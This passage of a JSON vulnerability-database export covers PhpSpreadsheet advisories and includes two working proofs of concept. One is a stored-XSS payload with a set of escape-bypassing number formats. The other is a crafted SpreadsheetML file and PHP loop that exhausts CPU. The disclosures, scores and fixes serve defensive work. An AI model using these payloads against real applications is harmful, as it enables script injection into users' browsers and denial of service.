equals the original data to decide whether to apply `htmlspecialchars()`:\n\n```php\nif ($cellData === $origData) {\n    $cellData = htmlspecialchars($cellData, ...);\n}\n```\n\nWhen a cell has a custom number format containing `@` (text placeholder) with any additional literal characters, the formatter replaces `@` with the cell value and adds the extra characters. This makes `$cellData !== $origData`, so `htmlspecialchars()` is **skipped entirely**.\n\nEven a single trailing space in the format (`@ `) is enough to bypass the escape.\n\n## Proof of Concept\n\n```php\nuse PhpOffice\\PhpSpreadsheet\\Spreadsheet;\nuse PhpOffice\\PhpSpreadsheet\\Writer\\Html;\nuse PhpOffice\\PhpSpreadsheet\\Cell\\DataType;\n\n$spreadsheet = new Spreadsheet();\n$sheet = $spreadsheet->getActiveSheet();\n\n// XSS payload with malicious number format\n$sheet->setCellValueExplicit('A1', '<img src=x onerror=alert(document.cookie)>', DataType::TYPE_STRING);\n$sheet->getStyle('A1')->getNumberFormat()->setFormatCode('. @');\n\n$writer = new Html($spreadsheet);\n$writer->save('output.html');\n```\n\nThe generated HTML contains:\n```html\n<td>. <img src=x onerror=alert(document.cookie)></td>\n```\n\nThe XSS payload is **completely unescaped**.\n\n## Tested Bypass Formats\n\n| Format Code | Result | Escaped? |\n|---|---|---|\n| `General` (default) | Original value | YES (safe) |\n| `. @` | `. ` + value | **NO (XSS!)** |\n| `@ ` (trailing space) | value + ` ` | **NO (XSS!)** |\n| `x@` | `x` + value | **NO (XSS!)** |\n\nThis was tested with PhpSpreadsheet 4.5.0 and confirmed the XSS executes in the browser.\n\n## Impact\n\nAny application that:\n1. Accepts uploaded XLSX files from users\n2. Converts them to HTML using PhpSpreadsheet's HTML writer\n3. Displays the HTML to other users\n\n...is vulnerable to stored XSS. The attacker embeds the payload in a cell value and sets a custom number format in the XLSX file's `xl/styles.xml`.\n\n## Suggested Fix\n\nAlways apply `htmlspecialchars()` regardless of whether formatting changed the value:\n\n```php\n// Instead of conditional escaping:\n$cellData = htmlspecialchars($cellData, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');\n```\n\nOr escape AFTER formatting, not conditionally based on equality.\n\n## Reporter\nKeyvan Hardani","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40296","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01724","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.0173","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0242","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02476","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0246","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40296"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T14:02:42Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-hrmw-qprp-wgmc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40296","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40296"},{"reference_url":"https://github.com/advisories/GHSA-hrmw-qprp-wgmc","reference_id":"GHSA-hrmw-qprp-wgmc","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hrmw-qprp-wgmc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-40296","GHSA-hrmw-qprp-wgmc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qz8g-w1uw-c7bb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90024?format=json","vulnerability_id":"VCID-raun-sztd-gub9","summary":"PhpSpreadsheet has CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader\n## Summary\n\nThe SpreadsheetML XML reader (`Reader\\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index=\"999999999\"` on a `<Row>` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service.\n\n## Details\n\nIn `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `<Row>` elements:\n\n```php\n// Xml.php:397-402\nif (isset($row_ss['Index'])) {\n    $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW\n}\nif (isset($row_ss['Hidden'])) {\n    $rowVisible = ((string) $row_ss['Hidden']) !== '1';\n    $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible);\n}\n```\n\nThe `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`:\n\n```php\n// Worksheet.php:1342-1351\npublic function getRowDimension(int $row): RowDimension\n{\n    if (!isset($this->rowDimensions[$row])) {\n        $this->rowDimensions[$row] = new RowDimension($row);\n        $this->cachedHighestRow = max($this->cachedHighestRow, $row);\n    }\n    return $this->rowDimensions[$row];\n}\n```\n\nThis inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`.\n\nThe `RowIterator` constructor uses `getHighestRow()` as its default end row:\n\n```php\n// RowIterator.php:84-88\npublic function resetEnd(?int $endRow = null): static\n{\n    $this->endRow = $endRow ?: $this->subject->getHighestRow();\n    return $this;\n}\n```\n\nWith `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection — it returns `true` for all cells.\n\nEven without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability.\n\n## PoC\n\n1. Create `poc.xml`:\n```xml\n<?xml version=\"1.0\"?>\n<?mso-application progid=\"Excel.Sheet\"?>\n<Workbook xmlns=\"urn:schemas-microsoft-com:office:spreadsheet\"\n xmlns:ss=\"urn:schemas-microsoft-com:office:spreadsheet\">\n <Worksheet ss:Name=\"Sheet1\">\n  <Table>\n   <Row ss:Index=\"999999999\" ss:Hidden=\"1\"/>\n   <Row><Cell><Data ss:Type=\"String\">test</Data></Cell></Row>\n  </Table>\n </Worksheet>\n</Workbook>\n```\n\n2. Load and iterate:\n```php\n<?php\nrequire 'vendor/autoload.php';\nuse PhpOffice\\PhpSpreadsheet\\IOFactory;\n\n$reader = IOFactory::createReader('Xml');\n$spreadsheet = $reader->load('poc.xml');\n$sheet = $spreadsheet->getActiveSheet();\n\necho \"Highest row: \" . $sheet->getHighestRow() . \"\\n\";\n// Outputs: Highest row: 1000000000\n\n// This loop will attempt ~1 billion iterations → CPU exhaustion\nforeach ($sheet->getRowIterator() as $row) {\n    // Never completes\n}\n```\n\n## Impact\n\nAny PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by:\n\n- Exhausting server CPU with a single small XML file (~300 bytes)\n- Blocking the PHP worker process, potentially affecting all concurrent users\n- Triggering PHP max_execution_time limits that still consume resources before killing the process\n\nThe attack requires no authentication — only the ability to upload or cause the application to process a crafted SpreadsheetML file.\n\n## Recommended Fix\n\nAdd MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`:\n\n```php\n// After line 398:\nif (isset($row_ss['Index'])) {\n    $rowID = (int) $row_ss['Index'];\n    if ($rowID > AddressRange::MAX_ROW) {\n        $rowID = AddressRange::MAX_ROW;\n    }\n}\n```\n\nAdd the necessary import at the top of the file:\n```php\nuse PhpOffice\\PhpSpreadsheet\\Cell\\AddressRange;\n```\n\nThe same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column dimension.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40863","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17452","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17559","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17553","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17515","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17436","published_at":"2026-06-08T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-40863"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-13T15:01:42Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-84wq-86v6-x5j6"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40863","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40863"},{"reference_url":"https://github.com/advisories/GHSA-84wq-86v6-x5j6","reference_id":"GHSA-84wq-86v6-x5j6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-84wq-86v6-x5j6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110319?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.30.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.30.4"},{"url":"http://public2.vulnerablecode.io/api/packages/110318?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.16","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.16"},{"url":"http://public2.vulnerablecode.io/api/packages/110317?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.4.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110316?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.10.5","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.10.5"},{"url":"http://public2.vulnerablecode.io/api/packages/110315?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@5.7.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@5.7.0"}],"aliases":["CVE-2026-40863","GHSA-84wq-86v6-x5j6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-raun-sztd-gub9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56572?format=json","vulnerability_id":"VCID-tebr-cwcv-3bam","summary":"PhpSpreadsheet allows bypassing of XSS sanitizer using the javascript protocol and special characters\n**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\n**CVSS vector v.3.1:** 5.4 (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)\n**CVSS vector v.4.0:** 4.8 (AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N)\n**Description:** an attacker can use special characters, so that the library processes the javascript protocol with special characters and generates an HTML link\n**Impact:** executing arbitrary JavaScript code in the browser\n**Vulnerable component:** class `PhpOffice\\PhpSpreadsheet\\Writer\\Html`, method `generateRow`\n**Exploitation conditions:** a user viewing a specially generated xml file\n**Mitigation:** additional sanitization of special characters in a string\n**Researcher: Igor Sak-Sakovskiy (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23210","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29617","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29513","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29546","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29579","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29526","published_at":"2026-06-09T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-23210"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-04T15:33:22Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/cde2926a9e2baf146783f8fd1771bbed7d1dc7b3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23210","reference_id":"CVE-2025-23210","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-23210"},{"reference_url":"https://github.com/advisories/GHSA-r57h-547h-w24f","reference_id":"GHSA-r57h-547h-w24f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r57h-547h-w24f"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f","reference_id":"GHSA-r57h-547h-w24f","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-04T15:33:22Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-r57h-547h-w24f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83996?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@1.29.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@1.29.9"},{"url":"http://public2.vulnerablecode.io/api/packages/83998?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.1.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.1.8"},{"url":"http://public2.vulnerablecode.io/api/packages/83997?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@2.3.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@2.3.7"},{"url":"http://public2.vulnerablecode.io/api/packages/83995?format=json","purl":"pkg:composer/phpoffice/phpspreadsheet@3.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-dzsc-krs5-kkhp"},{"vulnerability":"VCID-g5n6-3aer-gkgd"},{"vulnerability":"VCID-jw3b-hm9c-sbd2"},{"vulnerability":"VCID-qz8g-w1uw-c7bb"},{"vulnerability":"VCID-raun-sztd-gub9"},{"vulnerability":"VCID-v6u5-m45s-tbch"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/phpoffice/phpspreadsheet@3.9.0"}],"aliases":["CVE-2025-23210","GHSA-r57h-547h-w24f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tebr-cwcv-3bam"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57976?format=json","vulnerability_id":"VCID-v6u5-m45s-tbch","summary":"PhpSpreadsheet vulnerable to SSRF when reading and displaying a processed HTML document in the browser\n**Product:** PhpSpreadsheet\n**Version:** 3.8.0\n**CWE-ID:** CWE-918: Server-Side Request Forgery (SSRF)\n**CVSS vector v.3.1:** 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n**CVSS vector v.4.0:** 8.7 (AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)\n**Description:** SSRF occurs when a processed HTML document is read and displayed in the browser\n**Impact:** Server-Side Request Forgery\n**Vulnerable component:** the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class, `setPath` method\n**Exploitation conditions:** getting a string from the user that is passed to the HTML reader\n**Mitigation:** improved processing of the `$path` variable of the `setPath` method of the `PhpOffice\\PhpSpreadsheet\\Worksheet\\Drawing` class is needed\n**Researcher: Aleksey Solovev (Positive Technologies)**","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54370","reference_id":"","reference_type":"","scores":[{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33508","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33492","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.3346","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33439","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00137","scoring_system":"epss","scoring_elements":"0.33473","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54370"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/PHPOffice/PhpSpreadsheet"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/334a67797ace574d1d37c0992ffe283b7415471a","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/334a67797ace574d1d37c0992ffe283b7415471a"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4050f14521d70634c3320b170236574a6106eb39","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/4050f14521d70634c3320b170236574a6106eb39"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/81a0de2261f698404587a6421a5c6eb263c40b31","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/81a0de2261f698404587a6421a5c6eb263c40b31"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/ac4befd2f7ccc21a59daef606a02a3d1828ade09","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/ac4befd2f7ccc21a59daef606a02a3d1828ade09"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/c2cd0e64392438e4c6af082796eb65c1d629a266","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-08-25T14:34:28Z/"}],"url":"https://github.com/PHPOffice/PhpSpreadsheet/commit/c2cd0e64392438e4c6af082796eb65c1d629a266"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54370","reference_id":"CVE-2025-54370","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54370"},{"reference_url":"https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2025-54370.yaml","reference_id":"CVE-2025-54370.YAML","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2025-54370.yaml"},{"reference_url":"https://github.com/advisories/GHSA-rx7m-68vc-ppxh","reference_id":"GHSA-rx7m-68vc-ppxh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rx7m-68vc-ppxh"},{"reference_url":"https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-rx7m-68vc-ppxh","reference_id":"GHSA-rx7m-68vc-ppxh","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"